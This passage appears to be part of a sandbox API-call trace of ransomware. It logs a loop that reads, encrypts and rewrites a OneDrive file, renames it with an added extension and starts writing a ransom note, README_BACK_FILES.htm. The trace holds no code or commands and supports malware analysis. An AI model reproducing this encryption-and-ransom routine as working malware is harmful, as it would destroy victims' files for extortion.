hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.696] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.696] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.696] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.696] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.696] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.696] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.696] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.696] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.697] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.697] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.697] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.697] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.697] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.697] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.697] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.697] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.697] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.697] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.697] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.697] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.698] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.698] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.698] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.698] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.698] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.698] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.698] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.698] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.698] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.698] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.698] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.698] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.699] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.699] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.699] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.699] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.699] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.699] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.699] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.699] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.699] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.699] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.699] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.699] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.700] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.700] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.700] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.700] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.700] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.700] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.700] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.700] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.700] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.700] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.700] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.700] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.701] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.701] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.701] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.701] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.701] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.701] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.701] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.701] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.701] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.701] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.701] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.701] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.702] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.702] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.702] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.702] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.702] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.702] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.702] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.702] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.702] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.702] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.702] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.702] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.703] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x250, lpOverlapped=0x0) returned 1 [0280.703] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x250, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x260) returned 1 [0280.703] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x260, lpOverlapped=0x0) returned 1 [0280.703] CloseHandle (hObject=0x5d68) returned 1 [0280.703] CloseHandle (hObject=0x5d4c) returned 1 [0280.703] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lv\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lv\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lv\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lv\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0280.710] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lv\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0280.711] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lv\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lv\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0280.731] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lv\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lv\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lv\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lv\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0280.733] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0280.733] CryptDestroyKey (hKey=0x2fc908) returned 1 [0280.733] CryptReleaseContext (hProv=0x2f1e5e0, dwFlags=0x0) returned 1 [0280.733] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0280.733] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0280.733] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lv\\readme_back_files.htm")) returned 0xffffffff [0280.733] AreFileApisANSI () returned 1 [0280.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889890, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0280.733] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lv\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0280.735] GetFileType (hFile=0x5d3c) returned 0x1 [0280.735] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: 